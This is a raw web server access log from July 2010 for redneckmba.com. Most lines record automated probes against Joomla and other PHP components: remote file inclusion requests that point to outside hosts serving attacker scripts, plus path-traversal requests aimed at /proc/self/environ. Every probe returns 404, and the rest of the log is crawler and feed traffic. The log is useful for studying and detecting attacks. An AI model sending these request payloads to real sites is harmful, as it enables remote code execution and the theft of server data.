87.252.2.168 - - [19/Jul/2010:05:14:37 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:14:41 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:14:41 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:14:42 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:14:44 -0700] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
122.201.82.173 - - [19/Jul/2010:05:18:24 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
122.201.82.173 - - [19/Jul/2010:05:18:24 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bangkoklimo4u.com/image_post/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
67.218.116.168 - - [19/Jul/2010:05:21:08 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:23:32 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:23:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:23:33 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:52 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:52 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:52 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:54 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:54 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:05:27:54 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:28 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:28 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:28 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:30 -0700] "GET /logs/access.log//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:30 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:28:30 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
84.234.17.160 - - [19/Jul/2010:05:31:23 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://darky.fileave.com/id.citbun.txt HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
84.234.17.160 - - [19/Jul/2010:05:31:23 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://darky.fileave.com/id.citbun.txt HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
84.234.17.160 - - [19/Jul/2010:05:31:41 -0700] "GET /logs/skins/advanced/advanced1.php?pluginpath[0]=http://darky.fileave.com/id.citbun.txt HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
84.234.17.160 - - [19/Jul/2010:05:31:41 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://darky.fileave.com/id.citbun.txt HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:33:57 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:33:57 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:37:54 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:38:27 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:38:27 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:38:27 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:39:04 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:39:04 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:39:04 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:51:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:51:50 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:51:50 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:52:06 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:52:06 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
72.41.255.245 - - [19/Jul/2010:05:52:06 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:58:22 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:58:22 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:05:58:22 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.207 - - [19/Jul/2010:05:59:51 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.79.76.100 - - [19/Jul/2010:06:05:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
76.13.114.106 - - [19/Jul/2010:06:12:54 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
200.29.171.35 - - [19/Jul/2010:06:17:22 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.29.171.35 - - [19/Jul/2010:06:17:22 -0700] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.29.171.35 - - [19/Jul/2010:06:17:22 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
78.47.81.34 - - [19/Jul/2010:06:29:42 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
78.47.81.34 - - [19/Jul/2010:06:29:42 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
76.13.123.195 - - [19/Jul/2010:06:36:06 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
200.29.171.35 - - [19/Jul/2010:06:37:35 -0700] "GET /logs/access_100614.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:07:19:29 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
66.163.171.207 - - [19/Jul/2010:07:23:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [19/Jul/2010:07:37:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [19/Jul/2010:07:52:42 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
85.214.75.242 - - [19/Jul/2010:07:53:50 -0700] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
85.214.75.242 - - [19/Jul/2010:08:15:52 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
85.214.75.242 - - [19/Jul/2010:08:15:52 -0700] "GET /component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
85.214.75.242 - - [19/Jul/2010:08:15:53 -0700] "GET /logs//component/option,com_sitemap/Itemid,141/components/com_sitemap/sitemap.php?mosConfig_admin_=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:08:32:29 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:08:42:43 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
217.18.64.38 - - [19/Jul/2010:08:43:12 -0700] "GET /index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.64.38 - - [19/Jul/2010:08:43:12 -0700] "GET /logs/access.log//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
217.18.64.38 - - [19/Jul/2010:08:43:12 -0700] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [19/Jul/2010:08:44:23 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.207 - - [19/Jul/2010:09:01:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [19/Jul/2010:09:24:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:12 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:13 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:15 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:15 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [19/Jul/2010:09:33:16 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
125.176.223.185 - - [19/Jul/2010:09:33:59 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:09:38:27 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:09:48:51 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:09:49:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:09:54:26 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:09:59:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.169.141.174 - - [19/Jul/2010:09:59:27 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
75.126.196.145 - - [19/Jul/2010:09:59:33 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:10:00:06 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.169.141.174 - - [19/Jul/2010:10:00:13 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
75.126.196.145 - - [19/Jul/2010:10:00:26 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:10:00:45 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:03:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
216.129.119.47 - - [19/Jul/2010:10:03:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:04:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
125.176.223.185 - - [19/Jul/2010:10:04:15 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:04:52 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:10:05:14 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:10:05:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
77.74.49.4 - - [19/Jul/2010:10:05:15 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.169.141.174 - - [19/Jul/2010:10:05:28 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
81.169.141.174 - - [19/Jul/2010:10:05:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
81.169.141.174 - - [19/Jul/2010:10:05:28 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:05:31 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:06:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:06:05 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:06:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
80.249.166.63 - - [19/Jul/2010:10:06:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
75.126.196.145 - - [19/Jul/2010:10:06:54 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
75.126.196.145 - - [19/Jul/2010:10:06:54 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
75.126.196.145 - - [19/Jul/2010:10:06:54 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:10:07:03 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
87.252.2.168 - - [19/Jul/2010:10:07:03 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
